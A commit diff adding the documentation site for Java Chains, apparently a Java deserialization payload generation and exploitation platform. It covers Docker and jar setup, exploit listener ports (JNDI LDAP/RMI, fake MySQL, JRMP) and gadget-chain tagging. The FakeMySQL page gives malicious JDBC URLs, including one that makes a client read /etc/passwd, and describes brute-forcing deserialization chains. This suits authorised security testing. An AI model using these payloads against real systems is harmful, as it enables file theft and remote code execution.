first

Author: Ar3h

.github/workflows/deploy.yml

@@ -0,0 +1,51 @@
+name: Deploy to GitHub Pages
+
+on:
+  push:
+    branches:
+      - main
+    # Review gh actions docs if you want to further define triggers, paths, etc
+    # https://githubdocs.cn/en/actions/using-workflows/workflow-syntax-for-github-actions#on
+
+jobs:
+  build:
+    name: Build Docusaurus
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+      - uses: actions/setup-node@v4
+        with:
+          node-version: 18
+          cache: yarn
+
+      - name: Install dependencies
+        run: yarn install --frozen-lockfile
+      - name: Build website
+        run: yarn build
+
+      - name: Upload Build Artifact
+        uses: actions/upload-pages-artifact@v3
+        with:
+          path: build
+
+  deploy:
+    name: Deploy to GitHub Pages
+    needs: build
+
+    # Grant GITHUB_TOKEN the permissions required to make a Pages deployment
+    permissions:
+      pages: write # to deploy to Pages
+      id-token: write # to verify the deployment originates from an appropriate source
+
+    # Deploy to the github-pages environment
+    environment:
+      name: github-pages
+      url: ${{ steps.deployment.outputs.page_url }}
+
+    runs-on: ubuntu-latest
+    steps:
+      - name: Deploy to GitHub Pages
+        id: deployment
+        uses: actions/deploy-pages@v4

.gitignore

@@ -0,0 +1,20 @@
+# Dependencies
+/node_modules
+
+# Production
+/build
+
+# Generated files
+.docusaurus
+.cache-loader
+
+# Misc
+.DS_Store
+.env.local
+.env.development.local
+.env.test.local
+.env.production.local
+
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*

CNAME

@@ -0,0 +1 @@
+java-chains.vulhub.org

README.md

@@ -0,0 +1,4 @@
+站点正在部署中... 请等待 5 分钟
+
+The site is being deployed... Please wait 5 minutes
+

docs/contact-us.md

@@ -0,0 +1,30 @@
+---
+title: 问题反馈
+sidebar_position: 50
+---
+
+# 问题反馈
+
+:::note
+遇到问题进行反馈时，请描述清楚漏洞利用场景，并附带 java chains 完整生成的截图
+
+若遇到报错，请提供 Java Chains 的报错截图
+:::
+
+## Github issues
+
+https://github.com/vulhub/java-chains/issues
+
+## 微信群
+
+<img
+src={require('@site/static/doc/wxgroup.png').default}
+className="limitedImageSize"
+alt="wechat group"
+/>
+
+## Discord 频道
+
+https://discord.gg/ukC8KTrRXv
+
+

docs/guide.md

@@ -0,0 +1,117 @@
+---
+title: 快速上手
+sidebar_position: 10
+---
+
+# 快速上手
+
+## 什么是 Java Chains
+
+Java Chains 是一个 Java Payload 综合生成与利用平台，提供了生成各种 Java Payload 功能，能够用于测试 JNDI 注入、MySQL JDBC
+反序列化、JRMP 反序列化等场景。
+
+## 快速开始
+
+:::warning
+该平台默认只对 8011 端口进行了随机密码的登陆保护，其他端口可能存在被反制的风险，使用完相关功能后记得及时关闭相应端口
+:::
+
+### 方式一：Docker
+
+你可以通过 `docker` 一条命令启动 `java-chains` 项目（这也是推荐做法）
+
+```shell
+docker run -d \
+  --name java-chains \
+  --restart=always \
+  -p 8011:8011 \
+  -p 58080:58080 \
+  -p 50389:50389 \
+  -p 50388:50388 \
+  -p 3308:3308 \
+  -p 13999:13999 \
+  -p 50000:50000 \
+  -p 11527:11527 \
+  -e CHAINS_AUTH=true \
+  -e CHAINS_PASS= \
+  javachains/javachains:latest
+```
+
+通过环境变量配置鉴权或密码；
+
+**CHAINS_AUTH**: `true`为开启鉴权，`false`为关闭鉴权，默认开启鉴权
+
+**CHAINS_PASS**: 指定 web 密码，若该变量为空则随机生成密码，默认随机生成密码
+
+:::tip
+Payload 生成功能仅使用 `8011` 端口即可，其他端口为 `exploit` 模块所使用
+:::
+
+使用以下命令从 docker 中获取随机生成的强密码
+
+```shell
+docker logs $(docker ps | grep javachains/javachains | awk '{print $1}') | grep -E 'password'
+```
+
+输出示例
+
+```text
+11-12 06:59:53.301 INFO  [main] c.a.c.w.c.SecurityConfig       |  | password: XSsWerJFGcCjB8FU
+```
+
+登录页面：`http://your-ip:8011`
+
+### 方式二：Jar包启动
+
+:::warning
+仅支持
+JDK8，推荐使用 [Temurin](https://adoptium.net/temurin/releases/?version=8&package=jdk) / [Azul Zulu](https://www.azul.com/downloads/?version=java-8-lts&package=jdk#zulu)
+:::
+
+下载链接：https://github.com/vulhub/java-chains/releases/latest
+
+启动命令
+
+```bash
+java -jar java-chains-[version].jar
+```
+
+每次启动后会默认打印出随机生成的密码
+
+默认监听 0.0.0.0 ，登录页面：`http://your-ip:8011`
+
+可通过环境变量设置 web 登录密码，例如：
+
+import Tabs from '@theme/Tabs';
+import TabItem from '@theme/TabItem';
+
+<Tabs>
+  <TabItem value="bash" label="Bash">
+```bash
+export CHAINS_PASS=[your_password] && java -jar java-chains-[version].jar
+```
+  </TabItem>
+  <TabItem value="cmd" label="Cmd">
+```cmd
+set CHAINS_PASS=[your_password] && java -jar java-chains-[version].jar
+```
+  </TabItem>
+  <TabItem value="ps" label="Powershell">
+```powershell
+$env:CHAINS_PASS="[your_password]"; java -jar java-chains-[version].jar
+```
+  </TabItem>
+</Tabs>
+
+## 默认端口说明
+
+| 端口    | 备注                |
+|-------|-------------------|
+| 8011  | Java Chains Web端  |
+| 58080 | JNDI 提供 HTTP 字节码  |
+| 50389 | JNDI LDAP         |
+| 50388 | JNDI RMI          |
+| 3308  | Fake MySQL Server |
+| 13999 | JRMPListener      |
+| 50000 | HTTP Server       |
+| 11527 | TCP Server        |

docs/intro.md

@@ -0,0 +1,64 @@
+---
+title: 介绍
+sidebar_position: 20
+---
+# Java Chains 介绍
+
+了解以下内容可以帮助你更好使用 Java Chains
+
+## Payload 与 Gadget
+
+Java Chains 内部实现了一个简单的生成框架，生成指定 Poc 时，至少需要一个 Payload 以及多个 Gadget 链。
+
+**Payload** 是对 Gadget 链的处理，例如 `JavaNativePayload` 对 Gadget 链进行序列化，能够生成 Java 反序列化 Payload
+
+在前端页面的对应关系
+
+![](@site/static/doc/payload-gadget-intro.png)
+
+## 标签
+
+Payload 与 Gadget 之间、Gadget 与 Gadget 之间使用**标签**进行衔接，每个 Gadget 都有当前标签 tags、衔接标签 nextTags
+
+例如，名为 `CommonsBeanutils1` Gadget 的 nextTags 标签为 **Getter**，意味着允许任意 Getter 方法的调用，而 `TemplatesImpl`、
+`JdbcRowSetImpl`、`SignedObject`等 Gadget 含有 **Getter** 标签，所以会出现在 `CommonsBeanutils1` 的下一级
+
+使用标签衔接，在前端展示是通过级联选择器来实现，如下图所示：
+
+![](@site/static/doc/cb-tag-show.png)
+
+:::tip
+Gadget 名称显示为黄色，说明发现该 Gadget 在一些特殊情况下无法使用，需要自行查询 Gadget 的**描述**字段进行查看。
+
+例: `TemplatesImpl` Gadget 不适用于直接应用在 Hessian 反序列化中
+![](@site/static/doc/templates-not-for-hessian.png)
+
+:::
+
+## 模块
+
+Java Chains 有以下模块，点击即可跳转到文档详情
+
+[Generate: 生成](./module/generate.md)
+
+[JNDI: JNDI 利用](./module/jndi.md)
+
+[JRMPListener: RMI 反序列化利用](./module/jrmplistener.md)
+
+[FakeMySQL Server: MySQL 反序列化利用](./module/fakemysql.md)
+
+[HTTP Server: HTTP 服务](./module/httpserver.md)
+
+[TCP Server: HTTP 服务](./module/tcpserver.md)
+
+## System
+
+Java Chains 自身相关配置，例如 `ShowPayload` 可展示所有 Payload列表、 `ShowGadget` 可展示所有 Gadget
+
+![](@site/static/doc/showgadget.png)
+
+## WebsocketLog
+
+实时同步服务器 Java Chains 的日志
+
+适用于在 JNDI 等反连模块中查看请求日志

docs/module/fakemysql.md

@@ -0,0 +1,53 @@
+---
+title: MySQL JDBC 利用
+sidebar_position: 4
+---
+
+# MySQL JDBC 利用
+
+## FakeMySQLPayload
+
+MySQL JDBC 反序列化利用姿势
+
+The exploitation methods of the FakeMySQL module and the [JNDI module](jndi.md) are quite similar.
+
+JNDI transmits tokens through LDAP/RMI parameters to match with the backend and return the corresponding Payload.
+
+In contrast, FakeMySQL passes the token parameter via the MySQL JDBC username.
+
+This module also shares the same fallback mechanism as the JNDI module: if a token is not matched, it will default to returning the latest generated Payload.
+
+## FakeMySQLReadPayload
+
+MySQL JDBC 客户端文件读取、SSRF 姿势
+
+这里支持两个传参方式，第一种是在 java chains 输入参数，然后返回一个 token，把该放入 jdbc payload 中
+
+![](@site/static/doc/mysql-read.png)
+
+```
+jdbc:mysql://127.0.0.1:3308/test?user=[TOKEN]
+```
+
+第二种传参方式是在 username 中设置参数，格式为：`fileread_[file name]`
+
+其中 fileread_ 是固定前缀，后缀跟要读取的文件名，例如下面 JDBC 读取文件 Payload
+
+```
+jdbc:mysql://127.0.0.1:3308/test?user=fileread_/etc/passwd
+```
+
+## FakeMySQLSHPayload
+
+FakeMySQL 反序列化爆破链，一键测试常规反序列化链，提高测试效率
+
+![](@site/static/doc/mysql-showhand.png)
+
+可放入到 Burp 中进行批量爆破测试
+![](@site/static/doc/fake-mysql.png)
+
+总体使用流程等同于 JNDI 的爆破链，可进行参考: [JNDIShowHandPayload](./jndi.md#jndishowhandpayload)
+
+## 参考
+
+- https://github.com/4ra1n/mysql-fake-server